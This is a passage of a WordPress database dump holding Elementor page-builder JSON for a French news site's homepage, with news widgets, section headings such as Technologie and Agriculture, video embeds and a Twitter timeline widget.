padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2815,849,'_elementor_version','0.4'),(2816,849,'_elementor_css','a:3:{s:4:\"time\";i:1509459429;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2817,850,'_elementor_edit_mode','builder'),(2818,850,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5